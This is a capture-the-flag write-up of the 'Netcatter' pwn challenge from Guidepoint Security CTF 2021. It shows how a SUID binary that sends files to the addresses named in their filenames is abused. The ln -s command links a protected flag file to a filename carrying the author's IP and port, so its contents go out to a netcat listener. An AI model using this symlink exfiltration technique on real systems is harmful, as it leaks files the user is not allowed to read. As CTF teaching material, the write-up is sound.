Guidepoint Security CTF 2021 - Netcatter (pwn)
For this challenge we get ssh access to a docker container as a regular user. We don’t really get any clues as to what we are looking for so we start by exploring the machine a little.
Under running processes we see the following process that stands out:
root 1 /bin/sh -c /etc/init.d/ssh start && while true; do ./netcatter files ; sleep 60; done
We do a
find to see where this
netcatter file located and notice that it is a SUID binary and is owned by the user
target. Let’s exfiltrate the binary so we can have a look at it on our local machine. The docker container has very few tools installed for this so I ended up doing a
cat /opt/netcatter/netcatter | base64 -w 0 and copy-pasted it to my local machine.
Throwing the binary into Ghidra we can pretty quickly find out a few things:
- It looks for files in the directory that you pass it as a parameter (that would be
filesaccording to our process listing we saw earlier.)
- It does something with string splitting on a
:character on the filenames it finds in this directory.
- The string
/bin/nc.traditionalis in the binary.
Without fully reversing the binary we can now already make a pretty good guess at what this binary is doing so let’s test our theories. We will run the binary in a VM and put a file named
127.0.0.1:9001 in the directory we pass to it, and start a netcat listener to see if we get a connection. Indeed we do, but no data is sent to us and it does not appear to do anything with data we send back to it.
Putting some content in our test file we see the content is just sent over the socket. I put some shell script in there but it did not appear to execute it or anything to get code execution, but having file content sent to us is possibly enough to solve the challenge in itself. Let’s go back to our target server and see what we can do with this.
Since the binary is run as the
target user we’ll see what files are owned by this user that may be of interest to us. Running
find / -user target finds
/home/target/flag.txt. Now all we need to do is set up a listening socket on our local system and do a
ln -s /home/target/flag.txt /opt/netcatter/files/10.10.0.25:9001. (10.10.0.25 is the IP address of our machine on the CTF VPN network.) And our flag is neatly delivered to our netcat listening socket after a few seconds.